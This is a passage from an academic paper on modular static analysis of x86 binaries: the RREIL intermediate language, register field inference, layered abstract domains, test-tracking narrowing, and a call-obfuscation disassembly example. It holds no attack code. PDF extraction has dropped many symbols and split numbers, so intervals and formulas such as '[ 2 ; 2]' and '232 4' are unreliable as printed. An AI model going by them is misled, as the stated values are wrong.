single numeric variable in some abstract domain. We extend
this layout inference to registers, thereby enabling the access to
registers with different sizes and offsets which is common on
the x86-32 and x86-64 platforms. One particular oddity of the
x86-64 architecture is the implicit zero-extension when writing
the lower 32 bits of a register. For instance, the instruction
dec eax has the effect of setting the upper 32 bits of r ax
to zero and the lower 32 bits to eax   1. The translation into
RREIL of this instruction (without the calculation of flags) is
as follows:
00: sub rax : 3 2, rax : 3 2, 1 : 3 2
01: mov rax : 3 2 / 3 2 , 0 : 3 2
Here, the notation rax :s/o is an access to sbits of r ax
starting at bit offset o. In principle, our analysis can infer fields
at any bit offset and of any size. However, the translations of
common register instructions will lead to byte aligned fields as
shown in Fig. 1. Inferring these fields by tracking accesses has
been described in the context of analyzing C programs [14],
[15]. For the sake of an example, suppose that the analysis has
inferred the interval [   2 ; 2]for eax. The analysis of the two
instructions above will infer the interval [   3 ; 1]for the lower
half of r ax while the interval [0 ; 0]is inferred for the upper
half of r ax. In contrast, if no fields are inferred for registers
and a single numeric variable is used to model the content of
r ax, the following translation could be used:
00: sub t0: 3 2, rax : 3 2, 1 : 3 2
01: zero -extend rax : 6 4, t0 : 3 2
Here, the fictitious instruction zero -extend calculates
the effect of zero-extending the 32-bit value t 0to r ax.However, the best interval for r ax in the example would be
[0 ; 232  4], that is, nearly the full 32-bit unsigned range. Other,
more precise, numeric domains such as polyhedra [10] will
incur a similar precision loss. Thus, modelling registers as a
set of fields leads to an improved precision when employing
numeric abstract domains. This becomes important for vector
instructions which can be translated into a sequence of RREIL
instructions that access the vector register at different offsets.
A challenge arises in the analysis when converting
between differently sized fields as it becomes difficult
to retain precise numeric information. For instance, con-
sider a function freturning unsigned int . The call
unsigned long n = f() followed by n-=3 translates
into the following Intel x86-64 instructions (where the com-
piler has chosen to store nin the register eax):
00: call f
01: mov eax, eax
02: sub rax, 3
Here, the second statement implicitly sets the upper part of
r ax to zero which gives rise to the following RREIL code:
00: call f
01: mov rax : 3 2 / 3 2 , 0 : 3 2
02: mov rax : 3 2, rax : 3 2
03: sub rax : 6 4, 3 : 6 4
When evaluating the sub instruction, the analysis finds two
32-bit fields that constitute the 64-bits that are to be read.
Depending on the values of the two fields, a new 64-bit field
can be synthesized that holds a precise numeric value. For
instance, given an upper field whose value is tracked by uand
a lower field tracked by land whose value lies in [0 ; 232  1]
a new 64-bit field ccan be created with c = 232u + l. In the
example, since u = 0, this reduces to c = l. More propagation
rules are developed in [15, Chap. 5].
Although SAT solving can infer range information, these
approaches are less precise than our field-based approach [16,
Ex. 4] nor do they scale [17]. Scalability was one aspect in
the design of RREIL as detailed next.
C. Reducing the Size of RREIL Programs
A major disadvantage in the analysis of binaries is the
output size of the translation into the IL. As illustrated in
Sect. II-A, a simple comparison translates into no fewer
than eight RREIL instructions. Moreover, the translation of
arithmetic instructions creates similarly many assignments to
flags, even though these are usually not tested thereafter. Many
ILs that express the semantics at the bit-level create even
more instructions; consider, for instance, the corresponding
REIL translation of the test with 15 instructions. A simple
liveness analysis followed by a dead code removal can often
eliminate the majority of instructions as their calculated result
is never used. For instance, in the introductory example 12
REIL instructions and only 2 RREIL instructions remain.
Moreover, due to the use of fields in the RREIL language,
3
liveness analysis can be performed for each field (rather than
for the whole register), thereby also removing most of the
RREIL instructions generated for the x86-64 instruction set
that model the implicit zero extension of 32-bit arithmetic
instructions. Since liveness is a backward analysis, full dead
code removal can only be done once the complete CFG of a
function is known. However, a partial removal is possible by
assuming that all variables are live after an unresolved branch.
The intend is to allow for memory-intensive analyses on the
binary that are already possible at the C level [11].
D. A Formal Definition of RREIL
We conclude the discussion of translating assembler to
RREIL by a formal definition of the RREIL syntax. A precise
definition is instructive not only for comparisons with other
languages, but also in illustrating how RREIL instructions are
broken down into simpler statements that relate to memory
regions, fields of memory regions and their numeric content.
We commence by presenting the RREIL instructions that con-
cern the read and write access of a memory cell, a conditional
branch, a function call and return instruction (which are jumps
semantically). In all statements, information travels from right
to left, following the Intel convention.
rreil ::=load lval ;lval
jstore lval ;rval
jbrc condition ;rval
jcall rval
jreturn rval
jbase-stmt
The right-hand sides of each instruction use the definition
of a writable location lval and an rval, i.e. an expression or
interval where Z 1 = Z [ f 1 ; 1g. We use the term memory
region for id 2 Mwhich encompasses the set of registers
and temporary variables that are generated during translations.
Each memory region carries the size of the access which must
be the same across an instruction. One of two exceptions to
this rule are flags that are always one bit wide. Memory regions
may carry an optional bit offset written /sz.
condition ::=flag j c c 2 N
lval ::=var
rval ::=var j [ l ; u ] :sz l ; u 2 Z 1
var ::= id :sz ( =sz )? id 2 M
flag ::= id : 1 id 2 M
sz ::= n n 2 N
These definitions are also used in the rules for arithmetic and
comparisons which are summarized in the base-stmt produc-
tion, presented next. The base-stmt production encompasses
binary operations, comparisons, sign extension and the copy-
ing of values. The binary instructions must be applied to argu-
ments of equal size. Only the arguments of sign-extend
feature different sizes. The comparison statements test for
predicateaffinenarrowingcongruencedecodeL(rreil-stmt)reverse region mapBinary
arrays
wrapping domain...fieldsmemory domainnumeric domainL(memory)L(finite)L(zeno)queryqueryqueryqueryfixpoint enginestate+CFG storageL(rreil)addrfinite domain...intervalFigure 2. The analyzer’s domain hierarchy
equality, for “less or equal” on unsigned and signed values and
for “less than” on unsigned and signed values, respectively.
Both arguments have the same size. Greater-than comparisons
are translated by swapping their arguments.
base-stmt ::=binop lval ;rval ;rval
jcmpop flag ;rval ;rval
jsign-extend lval ;rval
jmov lval ;rval
binop ::=add jsub jmul
jdiv jdivs jshl jshr jshrs
jmod jand jor jxor
cmpop ::=cmpeq jcmpleu jcmples
jcmpltu jcmplts
While the 24 RREIL instructions make for a concise lan-
guage, the previous REIL language was even simpler, featuring
only 17 instructions. As illustrated in the next section, the
RREIL language is translated several times during the analysis,
each time turning into a simpler language. Since most end-user
implemented domains will use one of the simpler languages,
we believe that our design is in fact easier on third-party
developers than the original REIL instruction set.
4
III. C OMBINING ABSTRACT DOMAINS
A static analysis of executables differs from the analysis of
high-level languages in that the CFG is not known a priori.
The CFG, in turn, is necessary to propagate states between
basic blocks and to infer that a fixpoint is reached in each
loop. CFG reconstruction requires the precise inference of
possible jump targets for indirect jumps and calls. In the
case of switch -statements, the generated jump tables can
often be resolved by tracking a finite set of values, a so-
called value-set analysis. Our aim, however, is to implement
more sophisticated analyses that are required to assert, for
instance, the correctness of ordinary pointer accesses such
as those to stack-local arrays which are of particular interest
to the security auditor. Tracking more precise information
and, if required, user-defined information, requires a modular
approach to static analysis with the option of adding new
abstract domains in the form of a plug-in. Our approach to
a modular framework follows the two-tier approach of Astr  ́ee
[18] but extends it to four tiers to suit the need of the analysis
of executables. The original two tiers are the memory domain
and numeric domain in Fig. 2. The additional two tiers are
thereverse region map and the wrapping domain that are
detailed below. The interface to each tier is defined by a
grammar with RREIL being the interface to the first two tiers.
Since RREIL allows a calculated address in memory accesses
and indirect jumps, we create memory regions m 2 Mand
associate a consecutive range of addresses with mthat form a
semantic entity such as a stack frame, heap allocated memory,
a basic block in the code segment or a constant segment. An
RREIL operation on pointers is translated into an operation on
a memory region which is the task of the reverse region map.
In the future it will be responsible for summarizing memory
regions (such as heap regions or stack frames of recursive
calls). We now present the operations on memory regions.
A. Memory Domain
Let Xbe a set of abstract variables, that map to numeric
values in the current state. The purpose of the memory domain
is to associate ranges of bits of m 2 Mwith an abstract
variable x 2 X. For instance, the register r ax 2 Mmay
have a variable x l 2 Xassociated with the bits 0–31, thereby
representing the value of eax and a variable x h 2 Xthat
represents bits 32–63. Creating fields at fixed offsets is the
task of the field domain in Fig. 2. While registers can only
be accessed at constant offsets, the interface L (memory )also
allows accesses at calculated offsets.
memory ::=base-stmt jmem-test jmem-sup
jlval =regionsz!offset
jregionsz!offset =rval
mem-test ::=flag:= 0 jflag 6= 0
mem-sup ::=intro region jdrop region
region ::= m m 2 M
offset ::= x jsz x 2 XHere, the C-like sz-bit pointer dereference msz! oaccesses
m 2 Mat an offset o 2 X. If omaps to a non-constant
value, that is, an interval [ l ; u ], l 6= u, the field domain will
remove all fields overlapping with bits [ l ; u + s   1]with
sbeing the access size from lval orrval. Other domains
are conceivable such as the array domain in Fig. 2 which
summarizes accesses to a range of offsets with a fixed stride
into a single array cell. The figure shows the array domain as
a parent domain of the field domain which means that it can
execute any operation on the field domain while evaluating
msz! o. (Formally, the array domain Aand the field domain
Fform a cardinal power domain FA[12, Sect. 10.2].) In order
to illustrate the interaction between array andfield, consider
the following loop:
struct {short l,h; } m[100];
for (short i=0; i<100; i++)
{ m[i].l = 0; m[i].h = i; }
The loop is first analyzed with i = 0 so that the field
domain will create two fields as a response to msz! 16 = i
and msz! 0 = 0 . The second iteration of the fixpoint
computation will execute the loop body with msz! o = i
where o 2 f 16 ; 48 g, that is, o = 16 + 32 i, i 2 [0 ; 1]. The array
domain will observe the non-constant offset and intercept the
assignment before the field domain removes all information
on the inferred fields. Instead, it copies all fields at bits 0   31
to a new summary memory region m0using an assignment
operation on the field domain. The write operations on the ith
element are then translated to an operation on m0at offset
o   32 iwhich is constant, thereby re-using the capabilities of
thefield domain, to handle e.g. overlapping fields. The ability
to re-use existing domains is a major benefit in this hierarchical
arrangement. For instance, an end-user might plug-in other
domains such as one tracking the zero characters in a C string
buffer [19] which may, in turn, re-use the array domain.
The remaining operations on the memory domain test flags
(thereby implementing the semantics of conditional branches)
and change the support set (the set of mapped variables) by
introducing and removing memory regions using intro and
drop , respectively.
B. Finite Numeric Domains
The memory domains associates an abstract variable x 2 X
with each field inferred by the field domain or with the size of
an array. The underlying domains map xto possible numeric
values. Each abstract variable represents a finite number of
bits and the operations emitted by the memory region always
access all bits in a variable. The grammar of the interface
L (finite )between memory domains and the wrapping domain
therefore does away with offsets and, in particular, accesses at
non-constant offsets. To this end, it makes use of a production
base-stmtXthat correspond to productions base-stmt with
varX::= xandflagX::= xsubstituted for the corresponding
varandflagrules.
5
finite ::=base-stmtXjfin-test jfin-sup
jconvert varXvarX
fin-test ::=flagX := 0 jflagX6= 0
fin-sup ::=intro szvarXjdrop varX
Note that each variable x 2 Xin the finite domain has a
fixed bit size. This size is specified when creating a variable
using intro . Analogous to the requirement in RREIL that
every operation must use the same size for all arguments, each
operation in L (finite )may only use variables of equal size.
Exceptions are the result of comparisons, the sign-extend
operation and the new operation convert . The latter is used
to strip off most significant bits or to zero-extend a variable.
In order to infer strong relational invariants, such as in-
equality relations between variables, we translate operations
over Z 2wto abstract domains over Z. Since some operations
such as add andshl carry no signedness information, it is not
possible to simply check for overflow after each assignment.
Thus, we interpret each value v 2 Zof x 2 Xin the numeric
domain as v mo d 2win the finite domain, assuming that x
was introduced as having wbits. In this interpretation, no
checks for overflow are required for linear numeric trans-
formations [20]. Linear transformations, in turn, are exactly
those assembler instructions that carry no sign information.
As an example, consider an unsigned 4-bit variable x 2 X
for which the numeric domain tracks an interval [13 ; 15]
corresponding to the finite interpretations 1101 b ; 1110 b ; 1111 b.
A left-shift by one bit is a multiplication by two and leads to
the interval [26 ; 30]. Interpreting these values mo d 24yields
the bit patterns 1010 b ; 1011 b ; 1100 b ; 1101 b ; 1110 bwhich is a
sound approximation of the possible set of bit-patterns (which
excludes the second and forth pattern).
The arguments of relational tests and other operations whose
semantics depend on sign information (e.g. shr andshrs )
are checked if their values lie in the range of the corresponding
signed or unsigned w-bit integer. If not, they need to be
adjusted which might involve further approximation [20].
These translations are performed by the wrapping domain
shown in Fig. 2 which itself executes required operations on
the Zdomains. Recently, the use of SAT solvers has become
increasingly popular in the context of synthesizing transfer
functions [17]. Such solutions can be implemented against
the L ( nite )interface and may query the (wrapped) range
of variables through the wrapping domain. In particular, this
setup allows for expensive, SAT-based bit-level analyses to
only track variables that participate in bit-level operations and
leave the tracking of other variables to the numeric domains.
C. Numeric Domains over Z
The interface to the numeric domains features standard
operations on variables ranging over Zand is given by the
language L (zeno ), defined as follows:zeno ::=zeno-stmt jzeno-test jzeno-sup
zeno-stmt ::=lval =lin binop lin
jlval =zeno-test
jlval =lin = d d 2 N
jlval = [ l ; u ] l ; u 2 Z 1
zeno-test ::=lin relop 0
zeno-sup ::=intro lval jdrop lval
binop ::=  j  j % j > >
relop ::=:= j 6:= j < j 
lval ::= x ; x 2 X
lin ::=X
iai xi + cx i 2 X
a i ; c 2 Z
The language is comprised of statements, tests and instruc-
tions to modify the set of mapped variables. A statement sets
a variable to the result of a binary operation, a test, a linear
operation with divisor dor an interval. No bit-level binary
operators are allowed as they cannot reasonably be expressed
using numeric domains that model a convex state space.
While common bit-level identities such as xor x; x  0, are
substituted in the wrapping domain, usually only an interval
approximation is substituted, e.g. and x; y  0if x = [0 ; 0]
or y = [0 ; 0]in the numeric domain.
A test cmpleu f ; x 1 ; x 2translates to f = x 1   x 2  0
whenever the current values of x ilie within their unsigned
range. Otherwise, the result is approximated to e.g. f = x 1  
x 2   256in the case that x 2 2 [0 ; 255] and x 1 2 [256 ; 511] or
to f = [0 ; 1]in the worst case.
The simplicity of the numeric interface allows for a mod-
ular combination of domains described in the literature. One
interesting variation is our affine domain in Fig. 2 that tracks
equalities in a normal form of an upper-triangular matrix using
some fixed ordering on the variables X. When calculating the
join of two domains with nrows, the normal form makes it
possible to extract only the mequalities that differ, which is
possible in O ( m )rather than O ( j X j )[11]. Furthermore, if an
equality x = y + z + 5 is stored then the variable xis fully
determined and thus does not have to be stored in the child
domains, leading to a smaller support set of the underlying
domains narrowing . . . interval . This factoring trick also
simplifies many linear operations. For instance, the assignment
x = x + 1 is evaluated by inlining existing equalities into
the right-hand side, yielding x = y + z + 6, and replacing
the previous definition of x. Since xis only known in the
affine domain, no operation on the child domain is necessary.
Since binary programs exhibit many equality relations (e.g.
between registers and fields on the stack) our implementation
of the well-known affine domain [9] thereby improves the
performance of the analysis.
Since abstract domains tracking intervals and congruences
[21] are well-known, we turn to the narrowing andpredicate
domains that allow the inference of precise loop bounds.
6
IV. I NFERENCE OF NUMERIC LOOP INVARIANTS
The driving force behind our framework is the precise
numeric analysis of variable valuations in order to classify
the majority of memory access as correct, thereby alleviating
the need for further inspection by the security auditor. One
challenge in the analysis of binaries is that conditionals in
high-level programs are translated into a test setting certain
flags and a conditional jump. One way to link test and jump is
to perform forward substitution of the flag assignments into the
conditional jump [2]. This approach fails when the arguments
to the test are modified before the conditional jump, a situation
that may arise as a result of a compiler optimization. One fix is
to apply any modification to the tested register to the relational
test that is being propagated forward. Our analyzer pursues this
approach in a less ad-hoc way by tracking all observed tests
in a symbolic abstract domain dubbed predicate in Fig. 2. In
order to illustrate this process, consider the following RREIL
statements:
01: cmpltu CF: 1, eax : 3 2, 64 : 3 2
02: add eax : 3 2, eax : 3 2, 1 : 3 2
03: brc CF: 1, loop : 3 2
The purpose of the predicate domain is to track assignments
to flags symbolically, thus, it stores C F = eax < 100after the
first statement. The second statement increments a variable that
is mentioned in the symbolic expression, thereby rendering
this expression invalid. Rather than removing all information,
any linear assignment and transformation is simply applied to
the symbolic information, leading to C F = eax < 101in the
example. Once the conditional jump leads to test C F:= 1 on
the memory domain, the predicate domain also executes the
test eax < 101on its child domains, thereby making the effect
of the indirect test explicit.
A. The Widening/Narrowing Approach
One challenge when inferring bounds of variables is
the treatment of loops. In order to ensure termina-
tion, the classic approach is to apply widening, pos-
sibly followed by narrowing [10]. We illustrate the
widening/narrowing approach by extending the exam-
ple above to a loop that implements the C statement
for(int i=0; i<100; i++) {/ *body */}:
000: mov eax : 3 2, 0 : 3 2
001: / *body */
n+1: cmpltu CF: 1, eax : 3 2, 64 : 3 2
n+2: add eax : 3 2, eax : 3 2, 1 : 3 2
n+3: brc CF: 1, 001 : 3 2
The basic block starting at address 001 has two incoming
edges, namely one from address 000 where eax = 0 and one
from n+3 where eax = 1after the first iteration. Joining these
states as intervals leads to eax = [0 ; 1]. The idea of widening
is now to enforce a fixpoint by extrapolating the change at
address 001. From the states eax = [0 ; 0]in the first andeax = [0 ; 1]in the second iteration, widening discards the up-
per bound since it is unstable such that eax = [0 ; 1 ]. A further
iteration with this state leads to eax = [0 ; 100]. Rather than
merely joining this state to the widened state eax = [0 ; 1 ],
the analyzer replaces this state with eax = [0 ; 100], a process
called narrowing. Although, this approach often leads to good
(post-)fixpoints, it has the disadvantage that any statements in
the loop body (stored at addresses 001 to n) are analyzed at
least once with eax = [0 ; 1 ]which can lead to imprecise
results [22]. Worse, at n + 1the wrapping domain will check
if eax is in the range of a signed integer and set eax to
[   231; 231  1]since this is not the case. The latter implies that
the analysis would not be able to even infer that eaxis positive
as it assumes that it may wrap. Further show-stoppers are
indirect jumps to addresses read from an array that is indexed
using eax. Analyzing such a jump with eax 2 [   231; 231  1]
requires the CFG reconstruction to ignore this branch which
would constitute an unsound under-approximation.
B. Tracking Redundant Tests for Narrowing
In order to avoid the analysis of the loop body with a
temporarily over-approximated state, we include a narrowing
domain in the hierarchy shown in Fig. 2 that is able to
restrict the numeric state immediately after widening. The
key principle is to track all tests being evaluated, that is, all
tests that the predicate domain performs on its child domain
as a result of a flag being tested. In the example above, the
predicate domain translates the test of the carry flag C F:= 1
to the test eax   101 < 0on the underlying narrowing domain.
Each test is added to a set of observed tests O, in the example,
O = f eax   101 < 0 g. For the state in which the conditional
branch would not be taken, the predicate domain translates
C F:= 0 to eax > = 101 which is added to the set Oof
thenarrowing domain at n + 4. As in the predicate domain,
linear transformations are applied to the tests in Owhile other
transformations that affect an observed test o 2 O will discard
o. In other words, the invariant of the relations in Ois that
they hold in the current state.
In order to retain this invariant when joining states at points
where the control flow merges, the join operation of the
narrowing domain checks all tests that do not hold on both
branches. Each such test lin relop 0is checked if it holds in
the other domain. If so, the test is carried over into the joined
state. Reconsider the merge of the control-flow at address 001.
Here, two test sets O 1 = ;and O 2 = f eax < 101 gare to
be joined. The result O0= f eax < 101 gcontains the test
eax < 101as it holds after address 000 since eax = 0.
For each cycle in the CFG, the fixpoint engine applies
widening instead of join in order to ensure termination. The
difference to the join operation is that domains that model
state that can increase indefinitely (such as intervals which
may map a variable to the states [0 ; 0] ; [0 ; 1] ; [0 ; 2], etc.) have
to extrapolate this change in a way that infinitely increasing
chains of states are no longer possible. When widening the
narrowing domain, it will first widen its child domain and
afterwards apply all tests in Oto the child domain. In the
7
example, the interval domain is asked to widen the states
where eaxis [0 ; 0]and the state where it is [0 ; 1]which results
in an interval domain with eax being [0 ; 1 ]. Applying the
tests in O0= f eax < 101 grestricts the interval domain to
eax being [0 ; 100]. In the next loop iteration, a fixpoint will
be found with eax  99within the loop body and eax = 100
at address n + 4. Thus, the novel tracking of observed tests
for narrowing can avoid the problematic precision loss that is
especially damaging in the analysis of binaries.
V. E XPERIMENTAL EVALUATION
We have implemented the presented analysis framework in
Java with a front-end for x86-32 and x86-64 with ARM and
A VR front-ends in progress. In contrast to other analyzers [3],
[23] that build a single graph, we store a separate CFG for each
function. A new function is generated when a call instruction
is followed. This graph is augmented using a recursive descent
strategy until a ret instruction is encountered. Thus, a jump
into the body of a different function or into the middle of an
already decoded instruction augments the graph. A jump to
the address of an already decoded instruction of the current
function merely creates a new edge. Our tool is able to exactly
decode obfuscation examples given in [3], [24] in which the
executed instructions are not those that e.g. IDA Pro decodes.
The example in [24] shown as ret-obfus in Table I alters
the return address thereby violating the assumption that exe-
cution resumes after a call instruction. The example in [3],
dubbed insn-alias , decodes a mov instruction consisting
of 5 bytes at an address aand later indirectly jumps to a + 1
which then decodes a call instruction.
While a static analysis necessarily over-approximates the
set of possible jump targets, our tool is precise enough to
infer exact targets for each indirect jump in the examples.
Other heuristic-based approaches like IDA Pro or the ma-
chine learning approach in [24] not only over-approximate
the possible targets but may also miss jump targets thereby
potentially hiding the presence of malicious behavior which,
in turn, hampers the analysis of malware.
The examples msum andasum in Table I perform matrix
and array element summation. They evaluate our narrowing
that is implemented as part of the numeric domain hierarchy.
In both examples the analyzer recovered precise bounds for
all index variables occurring in the (nested) loops.
All times in Table I were taken on a 2.4 GHz Core i5
machine running Linux. Although these examples are rather
small, they still demand sophisticated analyses techniques and
therefore demonstrate the abilities of our framework. Each
double column in the table shows the analysis time, the mem-
ory usage, the number of RREIL instructions and the number
of original x86 instructions. The starred columns show the
effect of the liveness analysis on the RREIL translation. Dead-
code removal indeed halves the number of RREIL instructions
while the analysis time reduces considerably more (except for
test case mul). Although considerable care has been taken to
reduce the impact of JVM start-up time, the running times
should be taken with a grain of salt.A. Call Obfuscation Example
In order to demonstrate the utility of our tool in the context
of understanding executables, we show how the static analysis
of the program state helps in the reconstruction of the CFG.
The following X86-32 assembler fragment demonstrates a
simple call /return -obfuscation. The employed technique
is known as return-oriented programming [25].
When analyzing the example, it turns out that the instruc-
tions at addresses 0b and 10 are actually unreachable. Provid-
ing a correct disassembly requires the inference of numeric
information and the memory layout of the processors stack to
determine the follow-up instruction after the call at address 06.
Disassemblers that use a simple linear sweep approach and the
heuristic that execution will continue after a call instruction
will produce the following instruction sequence:
// main
00: 8d 35 14 00 00 00: lea esi, [14]
06: e9 06 00 00 00 : call 11
// the following two instructions are
// unreachable and could even be data
0b: b8 02 00 00 00 : mov eax, 2
10: c3 : ret
// trampoline
11: 58 : pop eax
12: 56 : push esi
13: c3 : ret
// callee
14: b8 01 00 00 00 : mov eax, 1
19: c3 : ret
The first instruction at offset 0 saves the address of the
callee to register esi; the second instruction calls the
trampoline function that passes control-flow to the pointer
in esi. The real call to callee is hidden in a sequence
ofpop,push andret instructions. The following listing
presents the correct disassembly, with basic blocks that form
a function grouped together (as done by our analysis):
// main
00: 8d 35 14 00 00 00: lea esi, [14]
06: e9 06 00 00 00 : call 11
// (inlined) callee
14: b8 01 00 00 00 : mov eax, 1
15: c3 : ret
// trampoline
11: 58 : pop eax
12: 56 : push esi
13: c3 : ret
The translation to RREIL code makes every side-effect
of native instructions visible and, thus, we will present the
translation after the removal of dead code. RREIL addresses
are encoded using the special notation x:ywhere xdenotes
the underlying native instruction’s address and ythe RREIL
sub-offset (one native instruction translates to several RREIL
8
benchmark time (ms) memory (Mb) RREIL Instr. x86 Instr.
* * *
ret–obfus 23 10 8 9 39 18 9
insn-alias 27 14 15 15 91 56 32
msum 209 68 35 27 157 48 26
asum 43 15 23 19 71 24 13
isquare 136 25 18 13 43 10 8
mul 348 232 211 180 3704 1094 527
Table I
ANALYZED EXAMPLES
instructions). Using sub-offsets allows for defining loops that
are required for the translation of X86 instructions using the
repz andrepnz prefixes. The example translates into the
following RREIL code which is discussed below:
// main
00.00: mov esi : 3 2, 14 : 3 2
06.00: sub esp : 3 2, esp : 3 2, 4 : 3 2
06.01: store esp : 3 2, 0b : 3 2
06.02: call 11: 3 2
// (inlined) callee
14.00: mov eax : 3 2, 1 : 3 2
19.00: load t0: 3 2, esp : 3 2
19.01: add esp : 3 2, esp : 3 2, 4 : 3 2
19.02: return t0: 3 2
// trampoline
11.00: load t0: 3 2, esp : 3 2
11.01: add esp : 3 2, esp : 3 2, 4 : 3 2
11.02: mov eax : 3 2, t0 : 3 2
12.00: mov t0: 3 2, esi : 3 2
12.01: sub esp : 3 2, esp : 3 2, 4 : 3 2
12.02: store esp : 3 2, t0 : 3 2
13.00: load t0: 3 2, esp : 3 2
13.01: add esp : 3 2, esp : 3 2, 4 : 3 2
13.02: return t0: 3 2
Lines 06.00 - 06.02 show the translation of the x86 call
instruction into RREIL. First, the address of the native in-
struction immediately following the call is saved on top of
the stack, then control is transferred to the target function.
From line 11.00 onwards, the saved return address is replaced
inside the trampoline function by the address given in esi.
Here, the first two triplets of RREIL instructions corresponds
to the x86-32 instruction pop eax,push esi. The ret
instruction then pops it’s destination address from the stack
which in this case is not the address of the caller main but
the value stored earlier in the register esi.
In this example, the trampoline function uses stack ma-
nipulation to obfuscate what would be a direct jump/call
to the passed-in function pointer. The code from the native
address 11 onwards is never decoded by our analysis and thus
cannot cause disassembly warnings or precision losses due to
invalid opcodes or branches to arbitrary memory. An analysisthat reconstructs one function at a time would assume that
call returns and thus evaluate mov eax, 2 ;ret thereby
inferring that the function can return with eax = 2.
Indeed, running this example in IDA Pro 6.1.110415 [26]
yields this interpretation, namely, the disassembly given in the
first listing. IDA Pro is not able to infer that instructions 0b
and 10 are actually unreachable (or possibly data) nor does
it emit a warning or stop its stack-pointer analysis. While the
two unreachable instructions seem harmless, the bytes could
have used to branch to a different part of the program, possibly
leading to an explosion of the function CFG.
We conclude by a discussion of related work.
VI. R ELATED WORK
While many static analyses for executables exist, most of
them do not raise above the abstraction level of our L (finite )
interface which precludes the use of classic numeric domains
that assume that variables range over Z. The latter domains,
however, are particularly attractive as they have been shown to
scale up to the analysis of large-scale C programs comprising
several 100kLOC [11]. When analyzing C rather than binaries,
the result of each assignment can be checked for overflow
since the types of the high-level language indicate if signed
or unsigned arithmetic is used. This distinction is lost for
many assembler instructions. For instance, add,sub and
shl carry no signedness information. This difficulty seems
to be reason enough for products such as CodeSurfer/x86
[23] to consider numeric domains ranging over Z 2w, that is,
domains that perform operations over a modulus ring, in order
to calculate the input/output behavior of a basic block [16].
Interestingly, it is possible to synthesize transfer functions for
a complete basic block that very accurately model bit-level
operations composed of xor andshl [17]. However, this
technique requires expensive SAT solving and does not scale to
64-bit architectures [16]. Moreover, it is neither modular since
every new property has to be added to the Boolean formula
passed to the SAT solver nor are the results easy to interpret.
Note that SAT solving methods can still be integrated in our
framework using the finite domain interface in Fig 2. Indeed,
by only tracking variables defined by bit-level operations and
using numeric domains to query and update other variables,
much smaller Boolean formulae can be obtained.
Another challenging aspect of analyzing low-level code, be
it C or assembler, is the reconstruction of the memory layout.
9
Our approach of using field inference [14] for registers seems
novel and is conceptually simpler than approaches based on
program transformation [27].
The problems of applying widening in the context of
binary analysis has attracted little attention so far. It has
been observed that narrowing after widening may lead to a
precision loss in domains whose transfer functions depend on
the values of variables [22]. The reconstruction of the CFG can
be thought of as such a domain: If the pointer offset into a
table of jump goals is temporarily unrestricted after widening,
the set of possible jump targets is meaningless and the analysis
cannot continue. Our approach of gathering constraints with
which the widened state is narrowed is therefore crucial when
analysing malware or more sophisticated programming styles.
Future work on our framework will address the design of
further abstract domains enabling, for example, the analysis
of string buffers [19] and more expressive numeric domains.
Another challenging aspect is to distil an interface that al-
lows for plugging-in modules that translate from L (rreil )
to L (base-stmt )which would enable different strategies to
analyse the functions of a program. Currently, we only perform
semantic inlining, that is, we re-analyse a function for each
new call-site.
VII. C ONCLUSION
The paper proposed a modular framework for a reachability
analysis of executable programs. It improves upon previous
work in that it provides an interface for inferring structural,
bit-level and numeric information, thereby allowing the design
of simple abstract domains at each level that are nevertheless
able to communicate across these interfaces. New abstract
domains can be added to improve the precision of the analysis;
this technique was demonstrated by presenting a new form
of widening. The experimental results show that the achieved
precision matches that of current heuristic-based approaches.
ACKNOWLEDGEMENT
We would like to thank Thomas Dullien and his team for
useful discussions and the anonymous referees for improving
the presentation of this paper. This work was supported by the
DFG Emmy Noether programme SI 1579/1.
REFERENCES
[1] A. Flexeder, B. Mihaila, M. Petter, and H. Seidl, “Interprocedural Con-
trol Flow Reconstruction,” in Asian Symposium onProgram Languages
andSystems, ser. LNCS, K. Ueda, Ed., vol. 6461. Shanghai, China:
Springer, November 2010, pp. 188–203.
[2] J. Kinder, F. Zuleger, and H. Veith, “An Abstract Interpretation-
Based Framework for Control Flow Reconstruction from Binaries,” in
Verification, Model Checking, andAbstract Interpretation. Springer,
2009, pp. 214–228.
[3] A. V . Thakur, J. Lim, A. Lal, A. Burton, E. Driscoll, M. Elder,
T. Andersen, and T. W. Reps, “Directed proof generation for machine
code,” in Computer Aided Verification. Springer, 2010, pp. 288–305.
[4] C. Cifuentes and S. Sendall, “Specifying the Semantics of Machine
Instructions,” in International Workshop onProgram Comprehension,
1998, pp. 126–133.
[5] T. Dullien and S. Porst, “REIL: A platform-independent
intermediate representation of disassembled code for static code
analysis,” CanSecWest Vancouver, Canada, 2009. [Online]. Available:
http://www.zynamics.com/downloads/csw09.pdf[6] J. Brauer and A. King, “Automatic Abstraction for Intervals us-
ing Boolean Formulae,” in Static Analysis Symposium, ser. LNCS,
R. Cousot and M. Martel, Eds. Springer, September 2010.
[7] N. Kettle and A. King, “Bit-Precise Reasoning with Affine Functions,”
inSatisfiability Modulo Theories. Princeton, New Jersey, USA: ACM,
2008, pp. 46–52.
[8] W. H. Harrison, “Compiler Analysis of the Value Ranges for Variables,”
Transactions onSoftware Engineering, vol. 3, no. 3, pp. 243–250, May
1977.
[9] M. Karr, “On affine relationships among variables of a program,” Acta
Informatica, vol. 6, no. 2, pp. 133–151, 1976.
[10] P. Cousot and N. Halbwachs, “Automatic Discovery of Linear Con-
straints among Variables of a Program,” in Principles ofProgramming
Languages. Tucson, Arizona, USA: ACM, Jan. 1978, pp. 84–97.
[11] B. Blanchet, P. Cousot, R. Cousot, J. Feret, L. Mauborgne, A. Min  ́e,
D. Monniaux, and X. Rival, “A Static Analyzer for Large Safety-Critical
Software,” in Programming Language Design andImplementation. San
Diego, California, USA: ACM, Jun. 2003.
[12] P. Cousot and R. Cousot, “Systematic Design of Program Analysis
Frameworks,” in Principles ofProgramming Languages. San Antonio,
Texas, USA: ACM, Jan. 1979, pp. 269–282.
[13] G. Balakrishnan and T. Reps, “Analyzing Memory Accesses in x86 Ex-
ecutables,” in InComp. Construct, 2004, pp. 5–23. [Online]. Available:
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.5.3669
[14] A. Min  ́e, “Field-Sensitive Value Analysis of Embedded C Programs
with Union Types and Pointer Arithmetics,” in Languages, Compilers,
andTools forEmbedded Systems. Ottawa, Canada: ACM, Jun. 2006,
pp. 54–63.
[15] A. Simon, Value-Range Analysis ofCPrograms. Springer, Aug. 2008,
no. ISBN 978-1-84800-016-2.
[16] M. Elder, J. Lim, T. Sharma, T. Andersen, and T. Reps, “Abstract
